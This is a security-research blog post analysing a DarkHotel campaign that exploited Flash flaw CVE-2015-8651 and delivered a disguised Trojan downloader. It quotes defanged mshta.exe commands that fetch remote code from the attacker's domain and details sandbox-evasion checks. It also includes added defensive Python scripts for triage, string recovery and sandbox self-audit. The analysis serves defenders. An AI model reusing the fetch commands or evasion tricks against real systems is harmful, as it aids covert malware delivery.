Anatomy of an active attack using CVE-2015-8651 from DarkHotel cybercriminal group
Mar 2 2016
On Dec 28 2015, Adobe released security updates for Adobe Flash Player. These updates address 19 critical vulnerabilities that could allow an attacker to take control of the affected system, including a fix for CVE-2015-8651, which, according to Adobe, was being used in limited, targeted attacks in the wild.
The earliest infection by CVE-2015-8651 in our tracking data dates back to Dec 24 2015, four days before Adobe released the security patch. The infections we have been tracking were reported from:
• China
• Russia
• North Korea
On Dec 31 2015, we published a blog post in Chinese, “Executives from China enterprise are being targeted by DarkHotel cybercriminal group” (https://threatbook.cn/blog_detail?id=4), about this active attack using CVE-2015-8651 that we identified in China. In this post we provide a more in-depth technical analysis of the attack: how its functionality is implemented, the anti-analysis and anti-detection techniques it uses, and our conclusions about the group behind it.
How - Attack vector
An active attack using a Flash zero-day, CVE-2015-8651 (Adobe released an out-of-band patch on Dec 28 2015), has been spreading via spear-phishing email since Dec 24 2015. The crafted SWF file exploiting CVE-2015-8651 is embedded as a downloadable link in a Word document sent as the email attachment.
The earliest infection report we received dates back to Dec 24 2015, four days before Adobe released the security patch for CVE-2015-8651. The infections are from China, Russia and North Korea.
When the SWF link is clicked, the crafted SWF exploits CVE-2015-8651 and executes the following shellcode:
The main function of the shellcode is to download a file named updata.exe and save it under the system %TEMP% folder. It then decrypts the content and turns it into a valid PE by prepending the MZ header with an ECHO command, so the payload as downloaded does not start with the MZ signature.
What – Malicious Payload Analysis
The downloaded updata.exe carries the following file property metadata, which presents it as a build of OpenSSL 1.0.1l.
Despite disguising itself as an OpenSSL component, updata.exe is a Trojan downloader: it attempts to download further malicious components and execute them via mshta.exe, using the following command lines:
- C:\Windows\system32\mshta.exe hxxp://manage-163-account.com/image/read.php?g0HNwgjM2QDN0kDNCFTLBZDM10iNwATQtY0MEJULEBzQxkjQ0Aze
- C:\Windows\system32\mshta.exe hxxp://manage-163-account.com/image/read.php?gws_rd=NjdFQzgzNTgzNzgy&gfe_rd=QzB2NDAwMDFFMDAwNTA2Nmw0Mi01UDEwNEE1MDBzOTAwMGkwRERDNg==
- C:\Windows\system32\mshta.exe hxxp://manage-163-account.com/image/read.php?gfe_rd=QzB2NDAwMDFFMDAwNTA2Nmw0Mi01UDEwNEE1MDBzOTAwMGkwRERDNg==&gws_rd=MUU1MTcxODY3RTJB
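As an added example (not code from the original post), the following Python triage script parses the three mshta.exe command lines above, embedded as constructed sample input, flags them as mshta.exe pulling remote content, and tests whether each query value decodes as base64, either directly or after reversing the string. The decoding heuristic is a general one, not a description of how the downloader builds its URLs, and the page does not say which system attribute the decoded values identify, so the script only reports the decoded text.

```python
"""Triage of mshta.exe command lines from the updata.exe downloader chain.

Added example, not code from the original post. The three command lines are
the ones listed above, embedded here as constructed sample input. The base64
handling (direct and reversed) is a general decoding heuristic, not a claim
about how the downloader builds its URLs.
"""
import base64
import binascii
import string
from urllib.parse import urlsplit

_PRINTABLE = set(string.printable) - set("\x0b\x0c")

# Constructed sample input: the command lines observed in the analysis above.
SAMPLE_CMDLINES = [
    r"C:\Windows\system32\mshta.exe hxxp://manage-163-account.com/image/read.php?g0HNwgjM2QDN0kDNCFTLBZDM10iNwATQtY0MEJULEBzQxkjQ0Aze",
    r"C:\Windows\system32\mshta.exe hxxp://manage-163-account.com/image/read.php?gws_rd=NjdFQzgzNTgzNzgy&gfe_rd=QzB2NDAwMDFFMDAwNTA2Nmw0Mi01UDEwNEE1MDBzOTAwMGkwRERDNg==",
    r"C:\Windows\system32\mshta.exe hxxp://manage-163-account.com/image/read.php?gfe_rd=QzB2NDAwMDFFMDAwNTA2Nmw0Mi01UDEwNEE1MDBzOTAwMGkwRERDNg==&gws_rd=MUU1MTcxODY3RTJB",
]


def _b64_to_text(token):
    """Strict base64 decode; return the text only if it is clean printable ASCII."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text and set(text) <= _PRINTABLE else None


def decode_token(token):
    """Try direct base64, then base64 of the reversed string. Returns (text, mode)."""
    text = _b64_to_text(token)
    if text is not None:
        return text, "base64"
    text = _b64_to_text(token[::-1])
    if text is not None:
        return text, "base64-reversed"
    return None, None


def triage_mshta(cmdline):
    """Flag an mshta.exe launch that pulls remote content and decode its query.

    Returns None for command lines that are not mshta.exe with a remote URL.
    """
    exe, _, arg = cmdline.partition(" ")
    if not exe.lower().endswith("mshta.exe"):
        return None
    refanged = arg.replace("hxxps://", "https://").replace("hxxp://", "http://")
    u = urlsplit(refanged)
    if u.scheme not in ("http", "https") or not u.netloc:
        return None
    params = []
    for part in u.query.split("&"):
        if not part:
            continue
        name, eq, value = part.partition("=")
        token = value if eq else name        # first URL: a bare token, no '='
        text, mode = decode_token(token)
        params.append({"name": name if eq else None, "raw": token,
                       "decoded": text, "mode": mode})
    return {"host": u.netloc, "path": u.path, "params": params,
            "reason": "mshta.exe executing remote content from " + u.netloc}


def decoded_params(cmdline):
    """Convenience view: {param name or raw token: decoded text}."""
    hit = triage_mshta(cmdline)
    if hit is None:
        return {}
    return {p["name"] or p["raw"]: p["decoded"] for p in hit["params"]}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        hit = triage_mshta(line)
        print(hit["reason"])
        for p in hit["params"]:
            print("  %s=%s -> %r (%s)" % (p["name"], p["raw"], p["decoded"], p["mode"]))
```

Run against the three samples, the bare token in the first URL decodes only after reversal, to a GUID-formatted string, while gws_rd and gfe_rd in the other two decode directly to short printable values; that the callback carries host-specific identifiers encoded this way is the useful hunting detail, independent of what each value means.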
The strings in updata.exe are heavily encrypted. Decryption happens dynamically in memory: the decryption function is called to decrypt a string, library name or API name at the moment it is needed, and once the value has been used, the memory block that held it is overwritten with unrelated text. This defeats memory tracking and memory dumping, two techniques security researchers commonly rely on when analyzing malware.
Here is a code snippet extracted from the payload that implements the technique described above:
The input parameters for the function m_CreateFileA are all decrypted dynamically. The API name CreateFileA itself is also decrypted dynamically from an encrypted table.
gEncApis and gEncWinDlls point to the encrypted string tables holding API names and Windows library names. This is what they look like after decryption:
DynMem_Erase is the function that wipes the decrypted memory block.
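Because decrypted names are wiped right after use, a memory dump taken after the call site will not contain them; the practical alternatives are a breakpoint on the decryption routine, or recovering the table statically. The following Python script, an added example rather than code from the post or the sample, shows the static route with a known-plaintext search: the real cipher is not disclosed on the page, so a single-byte XOR stands in for it, and ENC_TABLE is a constructed stand-in for gEncApis/gEncWinDlls (NUL-separated names XORed with 0x5A, a key the recovery code never sees). The brute force scores each candidate key by how many entries are well-formed identifiers and, with a heavier weight, how many are known API or DLL names.

```python
"""Known-plaintext recovery of an encrypted API/DLL name table.

Added example, not code from the original post or the sample. The sample's
real cipher is not disclosed there; a single-byte XOR stands in for it. The
table below is constructed: "CreateFileA\0WriteFile\0kernel32.dll\0" XORed
with 0x5A. The recovery never uses that key; it finds it.
"""
import re

# Constructed ciphertext standing in for gEncApis / gEncWinDlls.
ENC_TABLE = bytes([
    0x19, 0x28, 0x3F, 0x3B, 0x2E, 0x3F, 0x1C, 0x33, 0x36, 0x3F, 0x1B, 0x5A,
    0x0D, 0x28, 0x33, 0x2E, 0x3F, 0x1C, 0x33, 0x36, 0x3F, 0x5A,
    0x31, 0x3F, 0x28, 0x34, 0x3F, 0x36, 0x69, 0x68, 0x74, 0x3E, 0x36, 0x36, 0x5A,
])

# Names a downloader is expected to resolve. A real run would load the full
# export lists of kernel32/shell32/wininet and the usual DLL names instead.
KNOWN_NAMES = {"CreateFileA", "WriteFile", "ShellExecuteA", "VirtualAlloc",
               "kernel32.dll", "shell32.dll", "wininet.dll"}
_IDENT = re.compile(r"^[A-Za-z0-9_.]+$")


def xor_decrypt(data, key):
    """Single-byte XOR (the assumed stand-in cipher)."""
    return bytes(b ^ key for b in data)


def score_candidate(plain):
    """Score a decrypted table: +1 per identifier-shaped entry, +10 if it is a known name.
    Any non-ASCII entry disqualifies the key outright (name tables are ASCII)."""
    score = 0
    for chunk in plain.split(b"\0"):
        if not chunk:
            continue
        try:
            text = chunk.decode("ascii")
        except UnicodeDecodeError:
            return 0
        if _IDENT.match(text):
            score += 1
            if text in KNOWN_NAMES:
                score += 10
    return score


def recover_key(enc):
    """Brute-force the key byte; return (key, decrypted entries, score)."""
    best = (None, [], 0)
    for key in range(256):
        plain = xor_decrypt(enc, key)
        s = score_candidate(plain)
        if s > best[2]:
            entries = [c.decode("ascii") for c in plain.split(b"\0") if c]
            best = (key, entries, s)
    return best


if __name__ == "__main__":
    key, entries, score = recover_key(ENC_TABLE)
    print("key=0x%02X score=%d" % (key, score))
    for name in entries:
        print("  " + name)
```

The same scoring works for a rolling key or a byte-wise add, as long as the key space is small enough to enumerate; for a stronger scheme, breaking on the decryption routine and logging its output in call order is the quicker path, since the sample decrypts each name exactly when it is about to use it.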
In addition to string encryption, it applies anti-sandbox and anti-antivirus techniques to evade detection:
• Checking whether the module path contains any of the following strings, which are associated with sandbox analysis environments:
• Enumerating the running processes and comparing their names with a hard-coded string list. If any string matches, it exits.
• Checking the export tables of all loaded modules for the following exported functions, which are commonly found in sandbox and instrumentation tooling:
- "SbieDll_RunSandboxed": Sandboxie user-mode hooking DLL
- "hook_disable_retaddr_check": Cuckoo user-mode DLL
- "PinWinMain": Pintool (Intel Pin) DBI
- "dr_app_running_under_dynamorio": DynamoRIO DBI
• Checking whether the user account name contains any of the following key strings, which are associated with commonly known sandboxes:
• Checking whether any running process name contains the following key strings, which belong to commonly known antivirus programs:
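For a sandbox operator, the useful inverse of these checks is a self-audit: feed the same four kinds of evidence to a matcher with the sample's semantics (case-insensitive substring match for paths, process names and user names; exact-name match for exports) and see which check would make the sample bail. The Python below is an added example, not code from the post or the sample. The four export names are the ones listed above; the page does not reproduce its path, process, user and antivirus keyword lists, so the lists here are constructed stand-ins that an operator would replace with the real ones. Export names must be supplied by the caller (on Windows, by walking loaded modules with GetProcAddress), since that cannot be gathered portably.

```python
"""Self-audit of an analysis VM against the evasion checks described above.

Added example, not code from the original post or the sample. SANDBOX_EXPORTS
holds the four export names from the analysis; the other keyword lists are
constructed stand-ins for tables the page does not reproduce.
"""
import getpass
import os
import sys

SANDBOX_EXPORTS = {
    "SbieDll_RunSandboxed",             # Sandboxie user-mode hooking DLL
    "hook_disable_retaddr_check",       # Cuckoo user-mode DLL
    "PinWinMain",                       # Intel Pin tool
    "dr_app_running_under_dynamorio",   # DynamoRIO
}
# Constructed stand-ins for the page's (unlisted) keyword tables.
SANDBOX_PATH_WORDS = ["sandbox", "sample", "malware"]
SANDBOX_PROCESS_WORDS = ["vboxservice", "vmtoolsd", "procmon", "wireshark"]
SANDBOX_USER_WORDS = ["sandbox", "malware", "virus"]
AV_PROCESS_WORDS = ["avp", "mcshield", "msmpeng"]


def _contains_any(value, words):
    """Case-insensitive substring match, the semantics of the 'contains' checks."""
    v = value.lower()
    return [w for w in words if w.lower() in v]


def evasion_verdict(snapshot):
    """Return the checks this host would trip, in the order the sample runs them.

    An empty list means the sample would proceed to run on this host.
    """
    tripped = []
    hits = _contains_any(snapshot["module_path"], SANDBOX_PATH_WORDS)
    if hits:
        tripped.append(("module_path", hits))
    for proc in snapshot["processes"]:
        hits = _contains_any(proc, SANDBOX_PROCESS_WORDS + AV_PROCESS_WORDS)
        if hits:
            tripped.append(("process:" + proc, hits))
    exports = set(snapshot["exports"]) & SANDBOX_EXPORTS   # exact-name match
    if exports:
        tripped.append(("export", sorted(exports)))
    hits = _contains_any(snapshot["user"], SANDBOX_USER_WORDS)
    if hits:
        tripped.append(("user", hits))
    return tripped


def collect_snapshot(exports=()):
    """Gather what can be read portably; export names come from the caller."""
    procs = []
    if os.path.isdir("/proc"):                        # Linux: process names
        for pid in filter(str.isdigit, os.listdir("/proc")):
            try:
                with open("/proc/%s/comm" % pid) as f:
                    procs.append(f.read().strip())
            except OSError:
                pass
    try:
        user = getpass.getuser()
    except OSError:
        user = ""
    return {"module_path": sys.executable, "processes": procs,
            "exports": list(exports), "user": user}


if __name__ == "__main__":
    for check, hits in evasion_verdict(collect_snapshot()):
        print("would trip %s: %s" % (check, ", ".join(hits)))
```

The export check is the one that catches instrumented environments even when the VM's paths and users look innocuous, which is why the sample walks every loaded module rather than a fixed DLL list; a sandbox that loads its monitor DLL under a different name still exports the same symbols unless those are renamed too.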
Who – group behind the attack
Based on our analysis of the infection chain, tools and techniques used in this attack, the cybercriminal group behind it, DarkHotel, started to surface.
DarkHotel APT attacks can be traced back to 2007. Since 2010 the attacks have targeted corporate executives during business travel, attempting to plant a backdoor Trojan on their systems and steal business intelligence when they connect to the hotel network. In 2014 Kaspersky released a research report on this APT group and named it "DarkHotel". Its targets are usually Asia-Pacific business executives and senior staff, such as CEOs, SVPs and senior research staff, and the targeted industries are usually electronics manufacturing, telecommunications, investment, defense, automotive and so on.
Since 2013, the infection chains and techniques used in DarkHotel APT attacks have been similar. The infection vector starts with a spear-phishing email carrying an Office document with an embedded Flash link; the link leads to a crafted SWF file that exploits a Flash Player zero-day vulnerability and carries out the attack. The zero-day used in this round is CVE-2015-8651. To evade current antivirus detection, the payload applies multiple techniques similar to those described above.
The following table lists the attack characteristics of the DarkHotel group and compares the latest attack with its predecessors:
Indicators of Compromise (IOC)
Crafted SWF files exploiting CVE-2015-8651 (MD5):
Trojan downloader fetched by the SWF (MD5):
Domain hosting the HTA files: